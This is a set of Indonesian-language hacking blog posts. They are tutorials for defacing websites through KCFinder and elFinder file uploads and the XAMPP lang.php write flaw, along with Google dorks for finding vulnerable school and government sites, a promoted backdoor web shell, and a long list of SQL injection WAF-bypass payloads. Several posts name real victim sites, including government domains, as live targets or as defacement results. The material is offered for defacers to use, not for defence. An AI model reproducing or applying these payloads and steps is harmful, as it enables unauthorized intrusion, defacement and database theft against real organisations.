Naufal Ardhani - Hallo gaesss udah jarang jarang nih gua nulis di blog ini dan sekarang lagi pengen banget ngepost artikel di blog tapi masalahnya gua bingung mau nulis apa, dan tiba tiba aja kepikiran nulis Tutorial Deface POC KCFinder di Terminal dengan cURL.
KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.
cURL adalah proyek perangkat lunak komputer yang menyediakan pustaka dan alat baris perintah untuk mentransfer data menggunakan berbagai protokol.
Silahkan baca juga jika ingin lebih tau Upload File dengan cURL di Terminal.
Oke langsung aja ke Tutorialnya,,,, sebelum ke mengikuti Step siapkan dulu bahan yang diperlukan,
Bahan :
- Script Deface ( Simpan di Directory Desktop ) ( Simpan dengan nama index.shtml )
- Terminal / CMD
Tested :
- Buka Terminalnya, ketik "cd Desktop" tanpa tanda petik.
- lalu ketik "curl -F 'Filedata=@index.shtml' https://site.com/[path]/kcfinder/upload.php / link", Tapi disini target saya sudah ada seperti berikut "curl -F "Filedata=@index.shtml" http://seribuguru.org/assets/kcfinder/upload.php"
- Berhasil atau tidak? silahkan cek webnya dengan tambahkan /files/ setelah /kcfinder/upload/, Contoh : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml.
Sekian saja tutorial kali ini semoga sedikit bermanfaat ilmunya untuk menjadi Security Hunter :v
Naufal Ardhani - Hallo gaess kali ini gua bakal bagiin
Tutorial Deface elFinder + Upload Shell, Exploit ini sudah cukup lama ya tapi masih ada aja website yang masih vuln dengan exploit ini :v
dan pas gua lagi Pentest web
http://labuankec.pandeglangkab.go.id/ gua nemuin directory /elFinder/ dan langsung aja gua upload shell dan bugnya dah ditambel.
Dork :
- inurl:elfinder/elfinder.php.html ( dork kembangin lagi ya biar dapet yang vuln )
Exploit :
- www.site.com/[path]/elfinder/elfinder.php.html
Live Target : http://labuankec.pandeglangkab.go.id/
Step :
- Dorking di google, pilih target dan kasih exploit satu satu
- dan Disini gua pake Live Target dan beri exploitnya : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts/elfinder/elfinder.php.html
Langsung aja Upload Shell dengan ekstensi .phtml
lalu Akses deh Shellnya di www.site.com/[path]/elfinder/files/oxy.phtml
Sekian Tutorial Deface elFinder + Upload Shell semoga bermanfaat ilmunya.
nb : saya tidak bertanggung jawab atas apa yang kalian telah lakukan karna saya hanya membagikan ilmu untuk membantu admin web :3
Naufal Ardhani - Hallo gaes kali ini gua bakal bagiin ke-kalian
Tutorial Dump Database CMS Balitbang dengan Mudah, Kenapa mudah? ya karna ini inject databasenya pake tools jadi gaperlu manual lagi hehe dan target web yang pake cms balitbang masih banyak yg bisa di inject.
Bahan yang diperlukan :
- Tools ( KLIK INI )
- Akses Shell ( untuk upload tools ini )
- Google Dork ( inurl:/html/index.php site:sch.id )
Step :
- dorking target dulu.
- masukan url target yang sudah didapatkan.
- langsung klik inject ( dios sudah otomatis ada )
Jika berhasil akan muncul outputnya
Sekian Tutorial Dump Database CMS Balitbang dengan Mudah semoga bermanfaat yaaa.
Naufal Ardhani - Hallo gaes kali ini gua mau bagiin
Tools Balitbang Auto SQL-Injection yang dibuat oleh
Cy#b3r00t, Siapa itu
Cy#b3r00t? Ia adalah Seorang Defacer & Coder yang Skillnya lumayan Hebat entah dari kapan dia mulai belajar ilmu ilmu seperti itu tapi ia juga seorang Leader dari
Sora Cyber Team tim ini bukan tim ecek ecek ( jelek gitu :v ) karna membernya juga lumayan hebat hebat.
Nah langsung aja ke penjelasan Toolsnya, Tools Balitbang Auto SQL-Injection bisa digunakan untuk dump database Web Sekolah yang menggunakan CMS Balitbang Tidak semua bisa di inject tapi seenggaknya masih banyak yang bisa di inject dan tools ini sangat memudahkan para defacer karna cara pemakaianya hanya memasukan url dan dios.
Script :
Cara Pemakaian? Cek cek lagi di blog ini.
Thanks to : Cy#b3r00t - Sora Cyber Team - AnarchoXploit
Sumber :
Channel Cy#b3r00t
Shell Backdoor EXPLOIT1337 - Kali ini saya membagikan Shell Backdoor milik Exploit1337 nih, gausah banyak basa basi langsung aja nih dibawah.
Fitur :
- Upload
- Command
- Mass Tools
- Config
- Config V.2
- SymConfig
- Jumping
- CPanel Crack
- Symlink
- Symlink V.2
- Defacer.id
- Zone-H
- DB Dump
- Bypass vHost
- Auto Edit User
- Auto Deface WordPress
- Auto Edit Title WordPress
- SMTP Grabber
- Bypass Etc/Passw
- Csrf Exploiter
- CGI Telnet
- Fake Root
- Admin Finder
- NginDexer
- Adminer
- K-RDP Shell
- Domains Viewer
- Back Connect
- Back Connect V.2
- Disable Functions
- ZIP Menu
Screenshot :
Script :
- Paste.co ( password : naufalardhani.com )
Tutorial Mencari Admin Login Page dengan Terminal berbasis CLI [ PHP ] - Halo abang-abang semuanyaa udah lama nih kaga update artikel, nah kali ini saya bakalan ngasih
Tutorial Mencari Admin Login Page dengan Terminal berbasis CLI [ PHP ], pasti kalian suka kesel kan ga nemu admin loginya? padahal udah dapet username dan password web tersebut, biasanya sih ini dilakukan dengan teknik SQL Injection atau lain lain dan kebetulan sekali di wordlist admin finder ini ada 4001 kata pasti dengan trik ini bakal ke scan admin login pagenya :) banyak kan? ya iya dong hehe.
Tools By ./Mr.Cakil - 99Syndicate
Download Tools
Alat dan Bahan
- Terminal ( yang sudah terinstall PHP )
Tested : Terminal Mac
Oke langsung aja tutorialnya,
- Buka Zipnya dan Ekstrak ke Desktop
- Buka Terminal
- Masuk ke Directory Desktop :> cd Desktop
- Masuk ke Directory adfin :> cd adfin
- Jalankan Toolsnya :> php adfin.php
- Masukan site, ( anda masukan link web yang ingin di scan )
Tidak usah tunggu selesai proses scannya karna jika ditemukan langsung masuk ke result.txt
Silahkan cek result.txt :)
Sekian saja Artikel Tutorial Mencari Admin Login Page dengan Terminal berbasis CLI [ PHP ], tunggu artikel selanjutnya..
Macam-Macam Bypass SQLI dengan WAFF - Hello guys dah lama nih ga update artikel hehehe dan kali ini saya membagikan
Macam-Macam Bypass SQLI dengan WAFF, pasti bagi kalian para
Defacer sudah tidak asing lagi dengan POC
SQL-Injection, yap POC ini bisa dibilang mudah/susah tergantung webnya, jika kamu sering mengalami error saat sedang meng-inject sqlnya tenang aja disini saya akan memberikan
Macam-Macam Bypass SQLI dengan WAFF, dibawah yaaa.
WAFF
[~] order by [~]
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
[~] UNION select [~]
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
[~] information_schema.tables [~]
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
[~] concat() [~]
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))
[~] group_concat() [~]
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
Sekian artikel Macam-Macam Bypass SQLI dengan WAFF Terima Kasih telah mengunjungi blog saya :)
Naufal Ardhani - Kali in saya akan memberikan
Tutorial Deface Xampp Local Write Access, POC ini sedang banyak dipakai oleh defacer defacer karna apa? ntah lah :v karna saya cuma liat show off defacer di grup grup yang ada dan apa keuntunganya? hemmm... keuntungannya ialah bisa mirror di Zone-H :)
Oke Langsung aja
-
Dork
- inurl:/security/lang.php
- inurl:/xampp/lang.php
-Exploit
- /xampp/lang.php?Hacked_By_E4OXY ( untuk dir xampp )
- /security/lang.php?Hacked_By_E4OXY ( untuk dir security )
-Preview
- /xampp/lang.tmp ( untuk dir xampp )
- /security/lang.tmp ( untuk dir security )
-Step
- Dorking dulu, kalau saya menggunakan dork "inurl:/security/lang.php intext:xampp",

Beri Exploitnya, contoh "/security/lang.php?Hacked_By_E4OXY" (karna disini saya pakai dork yang inurl:security/lang.php jadi exploitnya juga di dir security),
Jika berhasil akan seperti gambar dibawah,
Untuk Preview hasilnya tinggal beri "/security/lang.tmp", contoh http://vega-apache.ingeneo.co/security/lang.tmp
Hasil saya :
http://www.mp-mall.com.hk/security/lang.tmp
http://www.moghulisran.com/security/lang.tmp
http://www.altebagestion.net/security/lang.tmp
http://vega-apache.ingeneo.co/security/lang.tmp
SEKIAN WASSALAM :)